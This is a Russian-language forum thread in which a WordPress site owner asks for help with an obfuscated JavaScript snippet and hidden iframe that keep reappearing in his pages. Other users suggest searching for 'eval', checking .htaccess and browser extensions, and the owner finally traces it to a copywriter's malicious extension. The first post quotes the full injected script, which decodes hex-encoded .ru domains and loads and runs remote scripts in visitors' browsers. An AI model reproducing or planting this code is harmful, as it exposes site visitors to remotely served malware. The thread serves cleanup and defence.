zAntiBot 61 Posted September 23, 2015 Report Share Posted September 23, 2015 Здравствуйте.У меня сайт на wordpresse нашел в коде страницы вот такой вот iframe: <script>// <![CDATA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("xn----stbafdtp7h.xn--p1ai")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html"></iframe> При попытки удалить появляется снова, что его генерит снова я не могу понять. Может кто сталкивался с таким и знает как вылечить? Link to post Share on other sites
KeshaSh 1 Posted September 23, 2015 Report Share Posted September 23, 2015 Возможно что какое-то расширение в браузере добавляет этот код, попробуйте убрать сначала все расширения у себя в браузере, а потом добавить материал. Link to post Share on other sites
amigo 128 Posted September 26, 2015 Report Share Posted September 26, 2015 По ищите файловым менеджером файлы с содержанием слова "Eval" - без кавычек. Обычно такое в зашифрованным виде лежит на сервере Все файлы которые найдутся присылайте сюда, посмотрим вместе. Ну и на будущее перепроверьте права на файлы и папки. Файловый менеджер: Total commanter -> поиск файлов -> искать по содержимому. Link to post Share on other sites
VIP serjin 1050 Posted September 26, 2015 VIP Report Share Posted September 26, 2015 Не лишним будет глянуть .htaccess на наличие инородных строчек Link to post Share on other sites
Модератор files 2798 Posted September 26, 2015 Модератор Report Share Posted September 26, 2015 Скорее всего вредоносное расширение в браузере вставляет код в момент редактирования/сохранения администратором. Link to post Share on other sites
ProtectYourSite 0 Posted September 26, 2015 Report Share Posted September 26, 2015 Надо сканировать весь сайт на исполняемые вирусы, а не на последствия как эти. Или обращаться к пофессионалам. Link to post Share on other sites
zAntiBot 61 Posted October 7, 2015 Author Report Share Posted October 7, 2015 Спасибо всем за ответы. Проблема была решена! У одного из копирайторов было левое расширение которое генерировало даный скрипт. Тему можно закрыть. Link to post Share on other sites
Recommended Posts